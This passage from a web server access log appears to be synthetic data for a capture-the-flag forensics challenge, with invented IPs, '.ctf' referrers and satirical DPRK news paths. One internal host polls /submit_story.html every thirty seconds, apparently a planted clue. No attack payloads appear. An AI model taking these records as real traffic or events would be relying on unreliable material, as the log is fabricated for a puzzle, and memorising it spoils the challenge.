HTTP/1.1" 200 2019 "http://www.northkiringulbestkiringul.ctf" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:51.0) Gecko/20100101 Firefox/51.0" +4.194.175.14 - - [23/Jul/2020:11:38:24 -0500] "GET /distance-surgery-aid-network-built-in-dprk/ HTTP/1.1" 200 10631 "http://www.northkiringulbestkiringul.ctf" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36" +192.168.51.66 - - [23/Jul/2020:11:38:24 -0400] "GET /submit_story.html HTTP/1.1" 200 1169 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko" +93.79.52.103 - - [23/Jul/2020:11:38:27 -0500] "GET / HTTP/1.1" 200 2868 "http://www.nkcna.ctf" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:51.0) Gecko/20100101 Firefox/51.0" +162.171.67.68 - - [23/Jul/2020:11:38:29 -0500] "GET /en/song-we-are-the-happiest-in-the-world/ HTTP/1.1" 200 11786 "http://www.nkcna.ctf" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36" +38.145.163.208 - - [23/Jul/2020:11:38:30 -0500] "GET / HTTP/1.0" 200 9910 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36" +69.10.138.253 - - [23/Jul/2020:11:38:34 -0500] "GET /kim-jong-un-guides-drill-for-ballistic-rocket-fire/ HTTP/1.1" 200 3647 "http://www.nkcna.ctf" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:51.0) Gecko/20100101 Firefox/51.0" +237.38.203.117 - - [23/Jul/2020:11:38:36 -0500] "POST /soy-based-dishes-popular-at-cooking-festival/ HTTP/1.1" 200 4620 "http://www.northkiringulbestkiringul.ctf" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.76 Safari/537.36" +231.160.2.24 - - [23/Jul/2020:11:38:37 -0500] "GET /tablet-computer-popular-in-dprk/ HTTP/1.1" 200 14993 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:50.0) Gecko/20100101 Firefox/50.0" +213.132.26.184 - - [23/Jul/2020:11:38:38 -0500] "POST /tele-mushroom-cultivation-technology-dissemination-system-developed-in-dprk/ HTTP/1.1" 301 3844 "http://www.nkcna.ctf" "Mozilla/5.0 (Windows NT 5.1; rv:51.0) Gecko/20100101 Firefox/51.0" +236.69.169.19 - - [23/Jul/2020:11:38:39 -0500] "GET /performance-of-revolutionary-opera-goes-on-in-dprk/ HTTP/1.1" 200 4068 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko" +199.68.115.154 - - [23/Jul/2020:11:38:41 -0500] "GET /en/nanotechnology-exhibition-in-dprk/ HTTP/1.1" 200 3316 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.77.4 (KHTML, like Gecko) Version/6.1.5 Safari/537.77.4" +23.159.37.191 - - [23/Jul/2020:11:38:44 -0500] "GET /kim-jong-fun/ HTTP/1.1" 200 8666 "http://www.google.ctf" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/602.3.12 (KHTML, like Gecko) Version/10.0.2 Safari/602.3.12" +40.235.247.225 - - [23/Jul/2020:11:38:45 -0500] "GET /2016-spring-table-tennis-tournament-for-disabled-and-amateurs/ HTTP/1.1" 200 3218 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36" +32.136.192.107 - - [23/Jul/2020:11:38:49 -0500] "POST /ryomyong-street-under-construction-in-pyongyang/ HTTP/1.1" 200 5605 "http://www.nkcna.ctf" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36" +151.209.80.243 - - [23/Jul/2020:11:38:53 -0500] "GET /dprk-foreign-ministry-spokesman-warns-u-s-of-its-moves-for-nuclear-war/ HTTP/1.1" 200 9350 "-" "Mozilla/5.0 (Windows NT 6.2; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0" +192.168.51.66 - - [23/Jul/2020:11:38:54 -0400] "GET /submit_story.html HTTP/1.1" 200 1169 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko" +69.145.66.219 - - [23/Jul/2020:11:38:57 -0500] "GET /ultimate-technology/ HTTP/1.1" 200 2968 "http://www.foxnews.ctf" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0" +118.224.175.80 - - [23/Jul/2020:11:38:58 -0500] "GET /en/dprk-pays-big-efforts-to-giving-all-people-education/ HTTP/1.1" 304 5007 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:51.0) Gecko/20100101 Firefox/51.0" +113.97.67.22 - - [23/Jul/2020:11:39:02 -0500] "GET /en/pyingpong-puppet-company/ HTTP/1.1" 200 2934 "http://www.nkcna.ctf" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:51.0) Gecko/20100101 Firefox/51.0" +143.236.5.114 - - [23/Jul/2020:11:39:04 -0500] "GET /quality-waterproof-liquid-made/ HTTP/1.1" 200 3001 "http://www.nkcna.ctf" "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36" +217.196.112.123 - - [23/Jul/2020:11:39:06 -0500] "GET /en/fifa-refereeing-course-held-in-dprk/ HTTP/1.1" 200 7732 "http://www.nkcna.ctf" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)" +122.188.249.216 - - [23/Jul/2020:11:39:10 -0500] "POST /new-books-published-in-dprk/ HTTP/1.1" 200 9339 "http://www.nkcna.ctf" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36" +111.24.96.56 - - [23/Jul/2020:11:39:13 -0500] "POST /en/pyingpong-puppet-company/ HTTP/1.1" 404 13248 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)" +31.108.55.153 - - [23/Jul/2020:11:39:16 -0500] "GET /en/tablet-computer-popular-in-dprk/ HTTP/1.1" 200 11023 "http://www.nkcna.ctf" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36" +138.137.75.149 - - [23/Jul/2020:11:39:19 -0500] "GET /dprk-foreign-ministry-spokesman-warns-u-s-of-its-moves-for-nuclear-war/ HTTP/1.1" 200 13124 "http://www.yahoo.ctf" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36" +121.201.253.211 - - [23/Jul/2020:11:39:22 -0500] "GET /kim-jong-un-visits-taedonggang-pig-farm/ HTTP/1.1" 200 2704 "http://www.yahoo.ctf" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36" +101.40.141.113 - - [23/Jul/2020:11:39:23 -0500] "POST /tablet-computer-popular-in-dprk/ HTTP/1.1" 404 6691 "http://www.foxnews.ctf" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:51.0) Gecko/20100101 Firefox/51.0" +175.200.100.158 - - [23/Jul/2020:11:39:25 -0500] "GET /quality-waterproof-liquid-made/ HTTP/1.1" 404 8682 "http://www.pyingyongtoday.ctf" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:51.0) Gecko/20100101 Firefox/51.0" +44.188.155.165 - - [23/Jul/2020:11:39:27 -0500] "GET /en/us-troops-had-better-quit-south-korea-in-good-time/ HTTP/1.0" 200 4530 "http://www.nkcna.ctf" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2486.0 Safari/537.36 Edge/13.10586" +208.83.13.34 - - [23/Jul/2020:11:39:29 -0500] "POST /sudoku/ HTTP/1.0" 200 12833 "http://www.nkcna.ctf" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.77.4 (KHTML, like Gecko) Version/6.1.5 Safari/537.77.4" +150.15.236.154 - - [23/Jul/2020:11:39:33 -0500] "GET /en/99-problems/ HTTP/1.1" 200 2083 "http://www.nkcna.ctf" "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36" +115.58.74.23 - - [23/Jul/2020:11:39:36 -0500] "GET /kim-jong-un-scales-north-koreas-tallest-mountain-to-get-energised-like-a-nuclear-weapon/ HTTP/1.1" 200 14900 "http://www.nkcna.ctf" "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36" +120.160.79.251 - - [23/Jul/2020:11:39:38 -0500] "GET /en/art-performances-of-kpa-officers-wives-given-before-full-house/ HTTP/1.1" 200 2035 "http://www.nkcna.ctf" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/537.75.14" +221.217.70.133 - - [23/Jul/2020:11:39:40 -0500] "GET /royal-blood-fresh-elixir-of-life/ HTTP/1.1" 200 5337 "http://www.nkcna.ctf" "Mozilla/5.0 (X11; Linux x86_64; rv:30.0) Gecko/20100101 Firefox/30.0" +140.202.140.122 - - [23/Jul/2020:11:39:43 -0500] "GET /kim-jong-un-visits-taedonggang-pig-farm/ HTTP/1.1" 404 7279 "http://www.nkcna.ctf" "Mozilla/5.0 (Windows NT 5.1; rv:30.0) Gecko/20100101 Firefox/30.0" +26.226.222.42 - - [23/Jul/2020:11:39:44 -0500] "GET / HTTP/1.1" 200 14381 "http://www.yahoo.ctf" "Mozilla/5.0 (Windows NT 6.3; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0" +83.159.145.36 - - [23/Jul/2020:11:39:48 -0500] "GET /soy-based-dishes-popular-at-cooking-festival/ HTTP/1.1" 200 12243 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36" +103.166.7.106 - - [23/Jul/2020:11:39:51 -0500] "GET /en/kim-jong-un-visits-taedonggang-pig-farm/ HTTP/1.0" 200 4977 "http://www.foxnews.ctf" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/602.4.8 (KHTML, like Gecko) Version/10.0.3 Safari/602.4.8" +192.168.51.66 - - [23/Jul/2020:11:39:55 -0400] "GET /submit_story.html HTTP/1.1" 200 1169 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko" +250.130.55.94 - - [23/Jul/2020:11:39:55 -0500] "POST /en/nanotechnology-exhibition-in-dprk/ HTTP/1.0" 200 5314 "-" "Mozilla/5.0 (Windows NT 6.1; rv:51.0) Gecko/20100101 Firefox/51.0" +219.243.173.49 - - [23/Jul/2020:11:39:57 -0500] "GET /dprk-foreign-ministry-spokesman-warns-u-s-of-its-moves-for-nuclear-war/ HTTP/1.1" 404 11541 "http://www.northkiringulbestkiringul.ctf" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36" +50.211.92.184 - - [23/Jul/2020:11:40:01 -0500] "POST /en/dprk-pays-big-efforts-to-giving-all-people-education/ HTTP/1.1" 200 4656 "http://www.northkiringulbestkiringul.ctf" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)" +3.157.172.185 - - [23/Jul/2020:11:40:04 -0500] "GET /pyongyang-medical-science-symposium-on-neurosurgery-held/ HTTP/1.1" 200 9725 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:24.0) Gecko/20140610 Firefox/24.0 Iceweasel/24.6.0" +251.144.244.133 - - [23/Jul/2020:11:40:06 -0500] "POST /en/ HTTP/1.1" 200 12372 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36" +99.240.59.129 - - [23/Jul/2020:11:40:07 -0500] "GET /en/kim-il-sungs-feats-for-liberation-of-korea-lauded/ HTTP/1.1" 200 8767 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 7_1 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D167 Safari/9537.53" +201.125.176.93 - - [23/Jul/2020:11:40:09 -0500] "GET /nuke-the-chinese/ HTTP/1.1" 200 3297 "http://www.pyingyongtoday.ctf" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.77.4 (KHTML, like Gecko) Version/6.1.5 Safari/537.77.4" +243.57.130.226 - - [23/Jul/2020:11:40:13 -0500] "GET /en/lair-of-king-tongmyongs-unicorn-reconfirmed-in-dprk/ HTTP/1.1" 200 9067 "http://www.yahoo.ctf" "Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko" +252.111.75.102 - - [23/Jul/2020:11:40:14 -0500] "POST /en/dprk-pays-big-efforts-to-giving-all-people-education/ HTTP/1.1" 200 5778 "http://www.nkcna.ctf" "Mozilla/5.0 (Windows; U; MSIE 9.0; WIndows NT 9.0; en-US))" +42.231.128.89 - - [23/Jul/2020:11:40:15 -0500] "POST / HTTP/1.1" 200 9083 "-" "Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko" +62.98.180.101 - - [23/Jul/2020:11:40:18 -0500] "GET / HTTP/1.1" 200 2573 "http://www.nkcna.ctf" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.76.4 (KHTML, like Gecko) Version/6.1.4 Safari/537.76.4" +4.113.211.199 - - [23/Jul/2020:11:40:19 -0500] "POST /fifa-refereeing-course-held-in-dprk/ HTTP/1.1" 200 8444 "http://www.nkcna.ctf" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/537.75.14" +44.35.89.39 - - [23/Jul/2020:11:40:21 -0500] "GET /pyongyang-medical-science-symposium-on-neurosurgery-held/ HTTP/1.1" 200 12305 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:50.0) Gecko/20100101 Firefox/50.0" +239.18.27.223 - - [23/Jul/2020:11:40:24 -0500] "POST /sports-contest-of-students-of-schools-of-orphans-held/ HTTP/1.1" 400 11352 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36" +192.168.51.66 - - [23/Jul/2020:11:40:25 -0400] "GET /submit_story.html HTTP/1.1" 200 1169 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko" +23.66.57.125 - - [23/Jul/2020:11:40:27 -0500] "GET /en/north-kiringul-air-force/ HTTP/1.1" 200 7986 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36" +66.123.113.198 - - [23/Jul/2020:11:40:31 -0500] "GET /floral-baskets-to-kim-jong-un-from-foreign-personages/ HTTP/1.1" 404 2155 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36" +205.105.126.61 - - [23/Jul/2020:11:40:33 -0500] "GET /2016-spring-table-tennis-tournament-for-disabled-and-amateurs/ HTTP/1.1" 200 5678 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36" +204.235.121.14 - - [23/Jul/2020:11:40:35 -0500] "GET /en/many-medical-scientific-achievements-made/ HTTP/1.0" 200 10429 "http://www.nkcna.ctf" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36" +212.158.44.48 - - [23/Jul/2020:11:40:38 -0500] "POST / HTTP/1.1" 304 2152 "http://www.nkcna.ctf" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36" +83.129.143.215 - - [23/Jul/2020:11:40:39 -0500] "POST /en/latest-rocket/ HTTP/1.1" 200 10313 "http://www.nkcna.ctf" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36" +228.176.13.143 - - [23/Jul/2020:11:40:40 -0500] "GET /en/dprk-pays-big-efforts-to-giving-all-people-education/ HTTP/1.1" 200 2703 "http://www.pyingyongtoday.ctf" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36" +35.133.45.171 - - [23/Jul/2020:11:40:44 -0500] "GET /en/ HTTP/1.0" 200 10189 "http://www.nkcna.ctf" "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36" +22.138.199.146 - - [23/Jul/2020:11:40:48 -0500] "GET /en/kim-il-sungs-feats-for-liberation-of-korea-lauded/ HTTP/1.1" 200 2652 "http://www.nkcna.ctf" "Mozilla/5.0 (Windows NT 5.1; rv:30.0) Gecko/20100101 Firefox/30.0" +161.142.69.157 - - [23/Jul/2020:11:40:50 -0500] "GET /kumdang-2-injection-manufactured/ HTTP/1.1" 200 2641 "http://www.nkcna.ctf" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36" +7.98.150.218 - - [23/Jul/2020:11:40:51 -0500] "POST /stem-cell-implantation-widely-introduced-in-dprk/ HTTP/1.1" 200 5868 "http://www.nkcna.ctf" "Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0" +246.99.145.185 - - [23/Jul/2020:11:40:54 -0500] "GET /99-problems/ HTTP/1.1" 301 12481 "http://www.yahoo.ctf" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.74.9 (KHTML, like Gecko) Version/7.0.2 Safari/537.74.9" +25.224.82.234 - - [23/Jul/2020:11:40:55 -0500] "POST /en/ HTTP/1.1" 200 4268 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.76 Safari/537.36" +192.168.51.66 - - [23/Jul/2020:11:40:55 -0400] "GET /submit_story.html HTTP/1.1" 200 1169 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko" +137.71.12.16 - - [23/Jul/2020:11:40:59 -0500] "POST /en/north-korean-military-developing-parade-capable-of-traveling-5000-miles/ HTTP/1.1" 200 6734 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36" +79.81.188.104 - - [23/Jul/2020:11:41:03 -0500] "POST /en/3rd-national-conference-of-financial-and-banking-officials-held/ HTTP/1.1" 404 14422 "http://www.nkcna.ctf" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:30.0) Gecko/20100101 Firefox/30.0" +116.219.190.116 - - [23/Jul/2020:11:41:06 -0500] "GET /tele-education-system-upgraded/ HTTP/1.1" 200 12329 "http://www.nkcna.ctf" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36" +30.192.118.93 - - [23/Jul/2020:11:41:07 -0500] "GET / HTTP/1.1" 200 13928 "http://www.nkcna.ctf" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/55.0.2883.87 Chrome/55.0.2883.87 Safari/537.36" +102.62.215.101 - - [23/Jul/2020:11:41:08 -0500] "POST /en/distance-surgery-aid-network-built-in-dprk/ HTTP/1.1" 200 11062 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36" +219.36.136.13 - - [23/Jul/2020:11:41:10 -0500] "GET /dancing-parties-held/ HTTP/1.1" 200 6536 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0" +182.58.187.50 - - [23/Jul/2020:11:41:11 -0500] "GET / HTTP/1.0" 200 11791 "http://www.nkcna.ctf" "Mozilla/5.0 (X11; Linux x86_64; rv:24.0) Gecko/20140610 Firefox/24.0 Iceweasel/24.6.0" +114.49.24.219 - - [23/Jul/2020:11:41:12 -0500] "GET /many-medical-scientific-achievements-made/ HTTP/1.0" 403 13327 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36" +199.205.87.110 - - [23/Jul/2020:11:41:16 -0500] "POST /many-medical-scientific-achievements-made/ HTTP/1.1" 200 11139 "-" "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36" +42.98.188.30 - - [23/Jul/2020:11:41:19 -0500] "POST /loving-care-for-people-source-of-dprks-invincibility/ HTTP/1.1" 200 9096 "http://www.nkcna.ctf" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.77.4 (KHTML, like Gecko) Version/6.1.5 Safari/537.77.4" +80.97.88.244 - - [23/Jul/2020:11:41:20 -0500] "GET /north-korean-military-developing-parade-capable-of-traveling-5000-miles/ HTTP/1.0" 200 9812 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_1) AppleWebKit/602.2.14 (KHTML, like Gecko) Version/10.0.1 Safari/602.2.14" +188.6.202.112 - - [23/Jul/2020:11:41:23 -0500] "GET /en/new-medicine-developed-in-dprk/ HTTP/1.1" 200 2583 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64; rv:51.0) Gecko/20100101 Firefox/51.0" +192.168.51.66 - - [23/Jul/2020:11:41:25 -0400] "GET /submit_story.html HTTP/1.1" 200 1169 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko" +102.227.10.112 - - [23/Jul/2020:11:41:26 -0500] "POST /en/sudoku/ HTTP/1.1" 200 13836 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36" +5.48.229.11 - - [23/Jul/2020:11:41:29 -0500] "GET /lair-of-king-tongmyongs-unicorn-reconfirmed-in-dprk/ HTTP/1.0" 403 4408 "http://www.foxnews.ctf" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36" +108.30.21.31 - - [23/Jul/2020:11:41:33 -0500] "GET /art-performances-of-kpa-officers-wives-given-before-full-house/ HTTP/1.1" 500 9750 "http://www.google.ctf" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36" +160.122.123.196 - - [23/Jul/2020:11:41:34 -0500] "GET /quality-waterproof-liquid-made/ HTTP/1.1" 200 13212 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/537.75.14" +170.232.216.219 - - [23/Jul/2020:11:41:35 -0500] "GET /performance-of-revolutionary-opera-goes-on-in-dprk/ HTTP/1.1" 400 3444 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 7_1 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D167 Safari/9537.53" +150.224.49.44 - - [23/Jul/2020:11:41:38 -0500] "POST / HTTP/1.1" 200 6798 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36" +234.132.149.83 - - [23/Jul/2020:11:41:41 -0500] "POST /kim-il-sungs-feats-for-liberation-of-korea-lauded/ HTTP/1.0" 200 8207 "http://www.foxnews.ctf" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:30.0) Gecko/20100101 Firefox/30.0" +137.116.242.213 - - [23/Jul/2020:11:41:45 -0500] "POST /dancing-parties-held/ HTTP/1.0" 200 9519 "http://www.nkcna.ctf" "Mozilla/5.0 (iPhone; CPU iPhone OS 7_1_1 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D201 Safari/9537.53" +21.42.17.44 - - [23/Jul/2020:11:41:47 -0500] "POST /new-mushroom-research-institute-inaugurated/ HTTP/1.1" 404 10568 "http://www.foxnews.ctf" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36" +239.210.146.53 - - [23/Jul/2020:11:41:50 -0500] "POST /tele-education-system-upgraded/ HTTP/1.1" 200 8556 "http://www.nkcna.ctf" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.76.4 (KHTML, like Gecko) Version/6.1.4 Safari/537.76.4" +102.9.90.116 - - [23/Jul/2020:11:41:52 -0500] "GET /new-national-record-set-in-archery/ HTTP/1.1" 200 14458 "http://www.nkcna.ctf" "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko" +203.215.184.104 - - [23/Jul/2020:11:41:53 -0500] "GET /en/dancing-parties-held/ HTTP/1.1" 400 9431 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:30.0) Gecko/20100101 Firefox/30.0" +192.168.51.66 - - [23/Jul/2020:11:41:55 -0400] "GET /submit_story.html HTTP/1.1" 200 1169 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko" +194.211.73.187 - - [23/Jul/2020:11:41:56 -0500] "POST /first-graduation-ceremony-of-tele-education-college-under-kim-chaek-university-of-technology-held/ HTTP/1.1" 200 4707 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.76 Safari/537.36" +43.81.201.71 - - [23/Jul/2020:11:41:57 -0500] "GET /kim-jong-un-visits-taedonggang-pig-farm/ HTTP/1.1" 200 5174 "http://www.nkcna.ctf" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36" +81.28.66.231 - - [23/Jul/2020:11:42:01 -0500] "POST /lair-of-king-tongmyongs-unicorn-reconfirmed-in-dprk/ HTTP/1.1" 200 13400 "http://www.yahoo.ctf" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36" +190.211.120.200 - - [23/Jul/2020:11:42:04 -0500] "GET /en/3rd-national-conference-of-financial-and-banking-officials-held/ HTTP/1.1" 304 9239 "http://www.yahoo.ctf" "Mozilla/5.0 (Windows; U; Windows NT 6.1; rv:2.2) Gecko/20110201" +185.218.240.136 - - [23/Jul/2020:11:42:08 -0500] "GET /new-national-record-set-in-archery/ HTTP/1.1" 200 5431 "http://www.nkcna.ctf" "Mozilla/5.0 (iPad; CPU OS 10_2_1 like Mac OS X) AppleWebKit/602.4.6 (KHTML, like Gecko) Version/10.0 Mobile/14D27 Safari/602.1" +119.253.172.151 - - [23/Jul/2020:11:42:11 -0500] "POST /mens-premier-soccer-league-for-torch-cup-in-dprk/ HTTP/1.1" 200 7481 "http://www.nkcna.ctf" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36" +23.147.9.109 - - [23/Jul/2020:11:42:12 -0500] "POST / HTTP/1.1" 200 11351 "http://www.yahoo.ctf" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36" +124.85.177.126 - - [23/Jul/2020:11:42:15 -0500] "GET /new-medicine-developed-in-dprk/ HTTP/1.1" 200 4776 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:51.0) Gecko/20100101 Firefox/51.0" +153.110.149.142 - - [23/Jul/2020:11:42:19 -0500] "POST /kim-jong-un-guides-drill-for-ballistic-rocket-fire/ HTTP/1.0" 200 5617 "http://www.yahoo.ctf" "Mozilla/5.0 (iPhone; CPU iPhone OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 